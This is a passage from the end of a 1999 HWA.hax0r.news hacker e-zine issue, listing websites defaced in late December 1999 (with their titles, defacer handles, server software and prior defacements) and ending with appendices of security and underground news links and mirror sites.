http://www.attrition.org/mirror/attrition/1999/12/23/www.cascades-spa.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.drkenner.com Site Title: Dr. Harris Kenner Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.drkenner.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.lunarvision.com Site Title: Lunar Video Communications Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lunarvision.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: cpma.apg.army.mil Site Title: Army Signal Command Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/cpma.apg.army.mil Defaced by: THESAINT666 Operating System: NT Previously defaced on 99.12.04 by k-0s Defaced domain: www.k9express.com Site Title: RD&K Associated Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.k9express.com Defaced by: BLN Operating System: NT Defaced domain: www.bankerusa.com Site Title: Banker of USA Mortgage Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.bankerusa.com Defaced by: THESAINT666 Operating System: Windows NT (IIS/3.0) Previously defaced on 99.04.23 by tonekore Potentially offensive content on defaced page. Defaced domain: www.freezonez.com Site Title: Blasie Tech Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.freezonez.com Defaced by: wired Operating System: FreeBSD (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.infoctr.edu Site Title: Library of International Relations Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.infoctr.edu Defaced by: THESAINT666 Operating System: NT Defaced domain: www.hotelsmexico.com Site Title: Posadas de Mexico Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.hotelsmexico.com Defaced by: THESAINT666 Operating System: NT Defaced domain: www.leet-2000.com Site Title: anastacio esteviz Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.leet-2000.com Defaced by: styles Operating System: BSDI (Apache 1.3.6) Potentially offensive content on defaced page. Defaced domain: www.expoente.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.expoente.com.br Defaced by: Ass0mbracao/OHB Operating System: Windows NT (IIS/4.0) Previously defaced on 99.10.19 and 99.12.11 by OHB and Death Knights Potentially offensive content on defaced page. Defaced domain: www.acommedia.com Site Title: ACom Media Ltd Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.acommedia.com Defaced by: phiber Operating System: Red Hat Linux (Apache 1.3.3) Potentially offensive content on defaced page. Defaced domain: www.conagg.com Site Title: Construction Aggregate Equipment Company Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.conagg.com Defaced by: Unknown since their HTML called a bad image. Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.ndn.co.jp Site Title: Nippon Data Net Limited Partnership Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.ndn.co.jp Defaced by: nemesystm Operating System: Windows NT (IIS/4.0) Previously defaced on 99.03.05 99.10.31 99.10.29 by xoloth1 () DHC Potentially offensive content on defaced page. Defaced domain: www.lyon.k12.ky.us Site Title: Kentucky K12 Schools Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.lyon.k12.ky.us Defaced by: PurpleHaze Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.gddc.pt Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.gddc.pt Defaced by: Shandar Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cphv.org Site Title: Center to Prevent Handgun Violence Mirror: http://www.attrition.org/mirror/attrition/1999/12/23/www.cphv.org Defaced by: Ass0mbracao Operating System: Windows NT (IIS/4.0) Previously defaced on 99.12.19 by Analognet Potentially offensive content on defaced page. Defaced domain: www.goprismatic.com Site Title: Totally Bogus Men Company Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.goprismatic.com Defaced by: #phreak.nl Operating System: Linux (Apache 1.3.4) Potentially offensive content on defaced page. Defaced domain: www.sicily.navy.mil Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.sicily.navy.mil Defaced by: THESAINT666 Operating System: Windows NT Potentially offensive content on defaced page. Defaced domain: www.ordermed.com Site Title: ordermed Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.ordermed.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.mute300.net Site Title: MUTE300 Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.mute300.net Defaced by: crack & crx Operating System: FreeBSD (Apache 1.2.6) Previously defaced on 99.11.17 by Sabu HIDDEN comments in the HTML. Potentially offensive content on defaced page. Defaced domain: www.domain-network.net Site Title: BLAH Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.domain-network.net Defaced by: wired Operating System: FreeBSD (Apache 1.2.6) Potentially offensive content on defaced page. Defaced domain: www.inet.tsinghua.edu.cn Site Title: Institute of Nuclear Energy Technology of Tsinghua University Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.inet.tsinghua.edu.cn Defaced by: Bosnatek Operating System: Solaris 2.5x Potentially offensive content on defaced page. Defaced domain: www.jadenterprises.com Site Title: J.A.D. Enterprises Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/24/www.jadenterprises.com Defaced by: w0lf Operating System: Irix? (Rapidsite/Apa-1.3.4) Potentially offensive content on defaced page. Defaced domain: www.asiplc.com Site Title: Automation Solutions, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.asiplc.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.webquestcom.com Site Title: Conquest Communications, Inc. Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.webquestcom.com Defaced by: Rhallado Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.networkmediadevices.com Site Title: Network Media Devices, Inc Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.networkmediadevices.com Defaced by: BOG Operating System: Linux (Apache 1.3.6) Potentially offensive content on defaced page. Defaced domain: www.colella.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.colella.com.br Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.planet3000.com Site Title: Sebastian Harrison Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.planet3000.com Defaced by: Rhallado Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.cafepiupiu.com.br Mirror: http://www.attrition.org/mirror/attrition/1999/12/25/www.cafepiupiu.com.br Defaced by: hts & white_course Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.presbycoalition.org Site Title: The Presbyterian Coalition Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.presbycoalition.org Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.vvs-online.com Site Title: V.V.S. bvba Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.vvs-online.com Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page Defaced domain: www.imagemine.com Site Title: imagemine Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.imagemine.com Defaced by: BLN Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. Defaced domain: www.tdicomputers.com Site Title: Aerodiam nv Mirror: http://www.attrition.org/mirror/attrition/1999/12/26/www.tdicomputers.com Defaced by: illusions team Operating System: Windows NT (IIS/4.0) Potentially offensive content on defaced page. and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW ** http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Colombia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- © 1998, 1999 (c) Cruciphux/HWA.hax0r.news (R) { w00t } -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- --EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF-- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=- [ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] [45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]